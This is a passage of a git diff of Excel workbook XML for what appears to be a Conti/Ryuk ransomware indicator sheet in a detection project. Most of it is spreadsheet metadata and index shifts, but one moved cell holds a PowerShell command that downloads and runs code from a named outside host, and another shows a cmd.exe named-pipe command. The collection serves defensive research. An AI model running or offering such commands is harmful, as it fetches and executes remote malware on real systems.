   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
@@ -8628,7 +8628,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{301C3F55-9B45-B04F-8A2F-9B3B47A6C66C}" name="PivotTable1" cacheId="21" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{301C3F55-9B45-B04F-8A2F-9B3B47A6C66C}" name="PivotTable1" cacheId="19" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C15" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="6">
     <pivotField dataField="1" showAll="0">
@@ -9649,7 +9649,7 @@
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="D17" sqref="D17"/>
+      <selection pane="bottomLeft" activeCell="D485" sqref="D485"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -10540,7 +10540,7 @@
         <v>802</v>
       </c>
     </row>
-    <row r="51" spans="1:6" ht="409.5" x14ac:dyDescent="0.2">
+    <row r="51" spans="1:6" ht="409.6" x14ac:dyDescent="0.2">
       <c r="A51" s="1" t="s">
         <v>99</v>
       </c>

--- a/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
+++ b/delta2/lib_e/osi_ransom/conti_ryuk.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/osi_ransom/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{276EFC05-44A0-3340-B205-A6A2BBFC43CE}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{43955380-CD37-0347-92B1-0FC063B1122D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="200" yWindow="1360" windowWidth="34560" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="40" yWindow="-21100" windowWidth="38360" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -18,7 +18,7 @@
   </sheets>
   <calcPr calcId="191029"/>
   <pivotCaches>
-    <pivotCache cacheId="19" r:id="rId3"/>
+    <pivotCache cacheId="55" r:id="rId3"/>
   </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
@@ -2312,9 +2312,6 @@
     <t>C:\Users\&lt;uname&gt;\AppData\LocalTemp\tdr58DD.exe</t>
   </si>
   <si>
-    <t>cmd /c powershell.exe -nop -hiddend -c "IEX ((new-object net.webclient).downloadstring('https://onlineworkercz.com:443/ahwjehefj'))"</t>
-  </si>
-  <si>
     <t>{"object": "process_create", "process_command_line": r''' c:\windows\system32\cmd.exe /c echo b30f789ed5b &gt; \\. \pipe\2b5fe9 ''', "initiating_process_command_line": "wuauclt.exe"}</t>
   </si>
   <si>
@@ -3529,6 +3526,9 @@
   </si>
   <si>
     <t>Count of eid</t>
+  </si>
+  <si>
+    <t>cmd /c powershell.exe -nop -hidden -c "IEX ((new-object net.webclient).downloadstring('https://onlineworkercz.com:443/ahwjehefj'))"</t>
   </si>
 </sst>
 </file>
@@ -8628,7 +8628,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{301C3F55-9B45-B04F-8A2F-9B3B47A6C66C}" name="PivotTable1" cacheId="19" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{301C3F55-9B45-B04F-8A2F-9B3B47A6C66C}" name="PivotTable1" cacheId="55" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C15" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="6">
     <pivotField dataField="1" showAll="0">
@@ -9313,7 +9313,7 @@
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
 <table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F548" totalsRowShown="0" dataDxfId="6">
   <autoFilter ref="A1:F548" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F548">
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A14:F528">
     <sortCondition ref="A1:A548"/>
   </sortState>
   <tableColumns count="6">
@@ -9648,8 +9648,8 @@
   <dimension ref="A1:F548"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="D485" sqref="D485"/>
+      <pane ySplit="1" topLeftCell="A51" activePane="bottomLeft" state="frozen"/>
+      <selection pane="bottomLeft" activeCell="D384" sqref="D384:D442"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -9673,7 +9673,7 @@
         <v>4</v>
       </c>
       <c r="D1" t="s">
-        <v>898</v>
+        <v>897</v>
       </c>
       <c r="E1" t="s">
         <v>2</v>
@@ -9695,7 +9695,7 @@
       </c>
       <c r="E2" s="1"/>
       <c r="F2" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9711,7 +9711,7 @@
       </c>
       <c r="E3" s="1"/>
       <c r="F3" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9727,7 +9727,7 @@
       </c>
       <c r="E4" s="1"/>
       <c r="F4" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9745,7 +9745,7 @@
       </c>
       <c r="E5" s="1"/>
       <c r="F5" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9763,7 +9763,7 @@
       </c>
       <c r="E6" s="1"/>
       <c r="F6" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9781,7 +9781,7 @@
       </c>
       <c r="E7" s="1"/>
       <c r="F7" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="8" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9799,7 +9799,7 @@
       </c>
       <c r="E8" s="1"/>
       <c r="F8" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9815,7 +9815,7 @@
       </c>
       <c r="E9" s="1"/>
       <c r="F9" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9831,7 +9831,7 @@
       </c>
       <c r="E10" s="1"/>
       <c r="F10" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="11" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9847,7 +9847,7 @@
       </c>
       <c r="E11" s="1"/>
       <c r="F11" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="12" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9863,7 +9863,7 @@
       </c>
       <c r="E12" s="1"/>
       <c r="F12" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="13" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9879,7 +9879,7 @@
       </c>
       <c r="E13" s="1"/>
       <c r="F13" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="14" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9895,7 +9895,7 @@
       </c>
       <c r="E14" s="1"/>
       <c r="F14" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="15" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9911,7 +9911,7 @@
       </c>
       <c r="E15" s="1"/>
       <c r="F15" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="16" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9929,7 +9929,7 @@
       </c>
       <c r="E16" s="1"/>
       <c r="F16" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="17" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9947,7 +9947,7 @@
       </c>
       <c r="E17" s="1"/>
       <c r="F17" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="18" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9965,7 +9965,7 @@
       </c>
       <c r="E18" s="1"/>
       <c r="F18" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="19" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -9983,7 +9983,7 @@
       </c>
       <c r="E19" s="1"/>
       <c r="F19" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="20" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10001,7 +10001,7 @@
       </c>
       <c r="E20" s="1"/>
       <c r="F20" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="21" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10019,7 +10019,7 @@
       </c>
       <c r="E21" s="1"/>
       <c r="F21" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="22" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10037,7 +10037,7 @@
       </c>
       <c r="E22" s="1"/>
       <c r="F22" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="23" spans="1:6" ht="68" x14ac:dyDescent="0.2">
@@ -10055,7 +10055,7 @@
       </c>
       <c r="E23" s="1"/>
       <c r="F23" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="24" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10073,7 +10073,7 @@
       </c>
       <c r="E24" s="1"/>
       <c r="F24" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="25" spans="1:6" ht="68" x14ac:dyDescent="0.2">
@@ -10091,7 +10091,7 @@
       </c>
       <c r="E25" s="1"/>
       <c r="F25" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="26" spans="1:6" ht="34" x14ac:dyDescent="0.2">
@@ -10109,7 +10109,7 @@
       </c>
       <c r="E26" s="1"/>
       <c r="F26" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="27" spans="1:6" ht="51" x14ac:dyDescent="0.2">
@@ -10127,7 +10127,7 @@
       </c>
       <c r="E27" s="1"/>
       <c r="F27" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="28" spans="1:6" ht="34" x14ac:dyDescent="0.2">
@@ -10145,7 +10145,7 @@
       </c>
       <c r="E28" s="1"/>
       <c r="F28" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="29" spans="1:6" ht="85" x14ac:dyDescent="0.2">
@@ -10163,7 +10163,7 @@
       </c>
       <c r="E29" s="1"/>
       <c r="F29" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="30" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10181,7 +10181,7 @@
       </c>
       <c r="E30" s="1"/>
       <c r="F30" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="31" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10199,7 +10199,7 @@
       </c>
       <c r="E31" s="1"/>
       <c r="F31" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="32" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10217,7 +10217,7 @@
       </c>
       <c r="E32" s="1"/>
       <c r="F32" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="33" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10235,7 +10235,7 @@
       </c>
       <c r="E33" s="1"/>
       <c r="F33" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="34" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10253,7 +10253,7 @@
       </c>
       <c r="E34" s="1"/>
       <c r="F34" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="35" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10269,7 +10269,7 @@
       </c>
       <c r="E35" s="1"/>
       <c r="F35" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="36" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10287,7 +10287,7 @@
       </c>
       <c r="E36" s="1"/>
       <c r="F36" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="37" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10305,7 +10305,7 @@
       </c>
       <c r="E37" s="1"/>
       <c r="F37" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="38" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10323,7 +10323,7 @@
       </c>
       <c r="E38" s="1"/>
       <c r="F38" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="39" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10341,7 +10341,7 @@
       </c>
       <c r="E39" s="1"/>
       <c r="F39" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="40" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10359,7 +10359,7 @@
       </c>
       <c r="E40" s="1"/>
       <c r="F40" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="41" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10377,7 +10377,7 @@
       </c>
       <c r="E41" s="1"/>
       <c r="F41" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="42" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10395,7 +10395,7 @@
       </c>
       <c r="E42" s="1"/>
       <c r="F42" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="43" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10413,7 +10413,7 @@
       </c>
       <c r="E43" s="1"/>
       <c r="F43" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="44" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10431,7 +10431,7 @@
       </c>
       <c r="E44" s="1"/>
       <c r="F44" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="45" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10449,7 +10449,7 @@
       </c>
       <c r="E45" s="1"/>
       <c r="F45" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="46" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10467,7 +10467,7 @@
       </c>
       <c r="E46" s="1"/>
       <c r="F46" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="47" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10483,7 +10483,7 @@
       </c>
       <c r="E47" s="1"/>
       <c r="F47" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="48" spans="1:6" ht="221" x14ac:dyDescent="0.2">
@@ -10501,7 +10501,7 @@
       </c>
       <c r="E48" s="1"/>
       <c r="F48" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="49" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10519,7 +10519,7 @@
       </c>
       <c r="E49" s="1"/>
       <c r="F49" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="50" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10537,7 +10537,7 @@
       </c>
       <c r="E50" s="1"/>
       <c r="F50" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="51" spans="1:6" ht="409.6" x14ac:dyDescent="0.2">
@@ -10553,7 +10553,7 @@
       </c>
       <c r="E51" s="1"/>
       <c r="F51" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="52" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10569,7 +10569,7 @@
       </c>
       <c r="E52" s="1"/>
       <c r="F52" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="53" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10587,7 +10587,7 @@
       </c>
       <c r="E53" s="1"/>
       <c r="F53" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="54" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10605,7 +10605,7 @@
       </c>
       <c r="E54" s="1"/>
       <c r="F54" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="55" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10623,7 +10623,7 @@
       </c>
       <c r="E55" s="1"/>
       <c r="F55" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="56" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10639,7 +10639,7 @@
       </c>
       <c r="E56" s="1"/>
       <c r="F56" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="57" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10657,7 +10657,7 @@
       </c>
       <c r="E57" s="1"/>
       <c r="F57" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="58" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10675,7 +10675,7 @@
       </c>
       <c r="E58" s="1"/>
       <c r="F58" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="59" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10693,7 +10693,7 @@
       </c>
       <c r="E59" s="1"/>
       <c r="F59" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="60" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10711,7 +10711,7 @@
       </c>
       <c r="E60" s="1"/>
       <c r="F60" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="61" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10729,7 +10729,7 @@
       </c>
       <c r="E61" s="1"/>
       <c r="F61" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="62" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10747,7 +10747,7 @@
       </c>
       <c r="E62" s="1"/>
       <c r="F62" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="63" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10765,7 +10765,7 @@
       </c>
       <c r="E63" s="1"/>
       <c r="F63" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="64" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10783,7 +10783,7 @@
       </c>
       <c r="E64" s="1"/>
       <c r="F64" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="65" spans="1:6" ht="34" x14ac:dyDescent="0.2">
@@ -10801,7 +10801,7 @@
       </c>
       <c r="E65" s="1"/>
       <c r="F65" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="66" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10819,7 +10819,7 @@
       </c>
       <c r="E66" s="1"/>
       <c r="F66" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="67" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10837,7 +10837,7 @@
       </c>
       <c r="E67" s="1"/>
       <c r="F67" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="68" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10855,7 +10855,7 @@
       </c>
       <c r="E68" s="1"/>
       <c r="F68" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="69" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10873,7 +10873,7 @@
       </c>
       <c r="E69" s="1"/>
       <c r="F69" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="70" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10891,7 +10891,7 @@
       </c>
       <c r="E70" s="1"/>
       <c r="F70" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="71" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10909,7 +10909,7 @@
       </c>
       <c r="E71" s="1"/>
       <c r="F71" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="72" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10927,7 +10927,7 @@
       </c>
       <c r="E72" s="1"/>
       <c r="F72" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="73" spans="1:6" ht="34" x14ac:dyDescent="0.2">
@@ -10945,7 +10945,7 @@
       </c>
       <c r="E73" s="1"/>
       <c r="F73" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="74" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10963,7 +10963,7 @@
       </c>
       <c r="E74" s="1"/>
       <c r="F74" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="75" spans="1:6" ht="34" x14ac:dyDescent="0.2">
@@ -10979,7 +10979,7 @@
       </c>
       <c r="E75" s="1"/>
       <c r="F75" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="76" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -10995,7 +10995,7 @@
       </c>
       <c r="E76" s="1"/>
       <c r="F76" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="77" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11011,7 +11011,7 @@
       </c>
       <c r="E77" s="1"/>
       <c r="F77" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="78" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11027,7 +11027,7 @@
       </c>
       <c r="E78" s="1"/>
       <c r="F78" s="1" t="s">
-        <v>802</v>
+        <v>801</v>
       </c>
     </row>
     <row r="79" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11045,7 +11045,7 @@
         <v>289</v>
       </c>
       <c r="F79" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="80" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11063,7 +11063,7 @@
       </c>
       <c r="E80" s="1"/>
       <c r="F80" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="81" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11081,7 +11081,7 @@
       </c>
       <c r="E81" s="1"/>
       <c r="F81" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="82" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11099,7 +11099,7 @@
       </c>
       <c r="E82" s="1"/>
       <c r="F82" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="83" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11117,7 +11117,7 @@
       </c>
       <c r="E83" s="1"/>
       <c r="F83" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="84" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11135,7 +11135,7 @@
       </c>
       <c r="E84" s="1"/>
       <c r="F84" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="85" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11153,7 +11153,7 @@
       </c>
       <c r="E85" s="1"/>
       <c r="F85" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="86" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11171,7 +11171,7 @@
       </c>
       <c r="E86" s="1"/>
       <c r="F86" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="87" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11189,7 +11189,7 @@
       </c>
       <c r="E87" s="1"/>
       <c r="F87" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="88" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11207,7 +11207,7 @@
       </c>
       <c r="E88" s="1"/>
       <c r="F88" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="89" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11225,7 +11225,7 @@
       </c>
       <c r="E89" s="1"/>
       <c r="F89" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="90" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11243,7 +11243,7 @@
       </c>
       <c r="E90" s="1"/>
       <c r="F90" s="1" t="s">
-        <v>803</v>
+        <v>802</v>
       </c>
     </row>
     <row r="91" spans="1:6" ht="17" x14ac:dyDescent="0.2">
@@ -11261,7 +11261,7 @@
       </c>
       <c r="E91" s="1"/>
